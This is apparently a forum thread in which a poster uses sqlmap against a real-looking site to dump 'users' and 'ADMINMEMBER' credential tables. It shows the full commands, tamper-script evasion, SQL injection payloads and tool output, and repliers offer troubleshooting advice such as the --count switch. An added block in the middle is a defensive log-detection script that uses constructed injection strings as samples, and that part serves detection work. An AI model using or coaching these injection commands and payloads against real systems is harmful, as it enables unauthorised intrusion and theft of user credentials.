Hello everybody, I used sqlmap, then queried and already got all the table names and column names, but when I do a dump:

| item |
| location |
| profile_pic |
| rdreamboard26 |
| refbrgy |
| refcitymun |
| refprovince |
| refregion |
| region |
| reply |
| reply_new |
| sub_category |
| test |
| test2 |
| users |
-----------------

and the columns of table users:

| username |
| password |
-----------------

So I use dump:

sqlmap -u "http:website.com" -D hotgamja -T users --dump --no-cast --flush-session --threads=5 --eta --batch

and

[07:41:26] [INFO] fetching columns for table 'users' in database 'hotgamja'
[07:41:35] [INFO] the SQL query used returns 2 entries
[07:41:35] [INFO] starting 5 threads
[07:45:35] [INFO] fetching entries for table 'users' in database 'hotgamja'
[07:45:35] [WARNING] the SQL query provided does not return any output
[07:45:35] [INFO] fetching number of entries for table 'users' in database 'hotgamja'
[07:45:35] [INFO] retrieved:
[07:45:36] [WARNING] unable to retrieve the number of entries for table 'users' in database 'hotgamja'
[07:45:36] [INFO] fetched data logged to text files under '/root/.sqlmap/output/

and nothing was retrieved. So please help me: how can I do it better to get access to the data when I dump? Help me please. icq : 692615965. Thanks so much.
First, thanks for your help, but there is still this error and it cannot dump the columns info, bro.

root@kali:~# sqlmap -u "http://xxxxxx103846" -D hotgamja -T users --dump --no-cast --flush-session --threads=3 --tamper "space2morehash.py" "space2hash.py" "space2mysqlblank.py" "charencode.py" "chardoubleencode.py" "charunicodeencode.py" "percentage.py" --eta --batch --time-sec=10

[07:45:35] [WARNING] the SQL query provided does not return any output
[07:45:35] [INFO] fetching number of entries for table 'users' in database 'hotgamja'
[07:45:35] [INFO] retrieved:
[07:45:36] [WARNING] unable to retrieve the number of entries for table 'users' in database 'hotgamja'

Bro, can you talk with me by ICQ?
Database dump, tables dump, or only columns dump: none of them get any information either, bro.

[08:26:25] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql')
[08:26:25] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[08:26:26] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[08:26:27] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[08:26:35] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[08:26:43] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[08:26:51] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[08:26:58] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[08:27:09] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[08:27:15] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[08:27:25] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
[08:27:30] [WARNING] parameter length constrainting mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected
GET parameter 'x_code' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 234 HTTP(s) requests:
---
Parameter: x_code (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: b_code=xxxxx1103846' AND 9168=9168 AND 'BDvf'='BDvf

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: b_code=xxxxx1103846' AND (SELECT 1396 FROM(SELECT COUNT(*),CONCAT(0x71786b7a71,(SELECT (ELT(1396=1396,1))),0x716b787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Akmy'='Akmy
---
[08:27:30] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[08:27:30] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.29, Apache 2.2.34
back-end DBMS: MySQL >= 5.0
[08:27:30] [INFO] fetching columns for table 'ADMINMEMBER' in database 'hotgamja'
[08:28:11] [INFO] the SQL query used returns 8 entries
[08:28:11] [INFO] starting 3 threads
[08:30:45] [INFO] fetching entries for table 'ADMINMEMBER' in database 'hotgamja'
[08:30:45] [WARNING] the SQL query provided does not return any output
[08:30:45] [INFO] fetching number of entries for table 'ADMINMEMBER' in database 'hotgamja'
[08:30:45] [INFO] retrieved:
[08:30:46] [WARNING] unable to retrieve the number of entries for table 'ADMINMEMBER' in database 'hotgamja'
[08:30:46] [WARNING] HTTP error codes detected during run: 414 (Request-URI Too Long) - 1 times
[08:30:46] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.xxxxx.com'

[*] shutting down at 08:30:46

root@kali:~#
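For defenders reading this thread: the boolean-based and error-based payload shapes, the double-encoding tamper and the 414 response shown in the output above all leave recognizable traces in web-server access logs. The following is an added example, not part of any post in the thread, that flags them; the log lines are constructed, and the path, IP addresses, rule names and function names are assumptions.

```python
import re
from urllib.parse import unquote_plus

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')
RULES = {
    # AND 9168=9168 / AND 'BDvf'='BDvf: the same literal on both sides of "="
    "boolean_tautology": re.compile(
        r"\b(?:AND|OR)\s+(?:(\d+)\s*=\s*\1\b|'(\w+)'\s*=\s*'\2)", re.I),
    "error_based_floor_rand": re.compile(
        r"FLOOR\(\s*RAND\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "information_schema": re.compile(r"\bINFORMATION_SCHEMA\.", re.I),
}

def fully_decode(uri, max_rounds=3):
    # Undo nested URL encoding (double-encoding tampers) before matching.
    for _ in range(max_rounds):
        uri, prev = unquote_plus(uri), uri
        if uri == prev:
            break
    return uri

def classify(line):
    # Return (client_ip, sorted rule names) for a suspicious line, else None.
    m = LINE.match(line)
    if not m:
        return None
    ip, uri, status = m.group(1), fully_decode(m.group(2)), m.group(3)
    hits = {name for name, rx in RULES.items() if rx.search(uri)}
    if status == "414":  # oversized probe rejected by the server
        hits.add("uri_too_long")
    return (ip, sorted(hits)) if hits else None

def summarize(lines):
    out = {}
    for line in lines:
        hit = classify(line)
        if hit:
            out.setdefault(hit[0], set()).update(hit[1])
    return out

def log_line(ip, uri, status):
    # Builds a constructed combined-format access-log line.
    return f'{ip} - - [10/Jan/2024:08:27:01 +0000] "GET {uri} HTTP/1.1" {status} 512'

SAMPLE = [  # constructed sample input, not taken from the thread
    log_line("198.51.100.4", "/view.php?x_code=1103846", 200),
    log_line("203.0.113.7", "/view.php?x_code=1%27%20AND%209168%3D9168%20AND%20%27BDvf%27%3D%27BDvf", 200),
    log_line("203.0.113.7", "/view.php?x_code=1%2527%2520AND%25209168%253D9168", 200),
    log_line("203.0.113.7", "/view.php?x_code=1%27%20AND%20(SELECT%201396%20FROM(SELECT%20COUNT(*),CONCAT(0x71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)", 200),
    log_line("203.0.113.7", "/view.php?x_code=" + "A" * 9000, 414),
]
```

`summarize(SAMPLE)` groups the matched rule names by client address, which is the view an analyst would alert on when one source trips several rules in a short window.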
Yes, I looked at all of them, bro. All tables:

| email_user_credit |
| email_user_credit_summary |
| email_user_stats_emailsperhour |
| email_usergroups |
| email_usergroups_access |
| email_usergroups_permissions |
| email_users |
| email_whitelabel_settings |
| item |
| location |
| profile_pic |
| rdreamboard26 |
| refbrgy |
| refcitymun |
| refprovince |
| refregion |
| region |
| reply |
| reply_new |
| sub_category |
| test |
| test2 |
| users |
+----------------------------------------+

I looked at all the columns also, but when I dump I get no information, bro.
Try with --count, because it is possible the table doesn't have any info.

Code:
Retrieve number of entries for table(s)

Switch: --count

In case that user wants just to know the number of entries in table(s) prior to dumping the desired one, he can use this switch.

Example against a Microsoft SQL Server target:

$ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1"\
 --count -D testdb

[...]
Database: testdb
+----------------+---------+
| Table          | Entries |
+----------------+---------+
| dbo.users      | 4       |
| dbo.users_blob | 2       |
+----------------+---------+
Did you read the previous messages?? All the answers to your questions are there. Try with the COUNT parameter; if it returns 0, it means the table has no info.
[20:11:11] [INFO] fetching tables for database: 'database'
[20:11:42] [INFO] the SQL query used returns 269 entries
[20:11:56] [INFO] retrieved: AA_test
[20:12:10] [INFO] retrieved: ADDSPEC
[20:12:26] [INFO] retrieved: ADMINMEMBER

check count is working bro
[23:58:39] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.29, Apache 2.2.34
back-end DBMS: MySQL >= 5.0
[23:58:55] [INFO] resumed:
[23:58:55] [ERROR] unable to retrieve the number of entries for any table
[23:58:55] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.xxxxx.com'

[*] shutting down at 23:58:55

Maybe it was blocked by something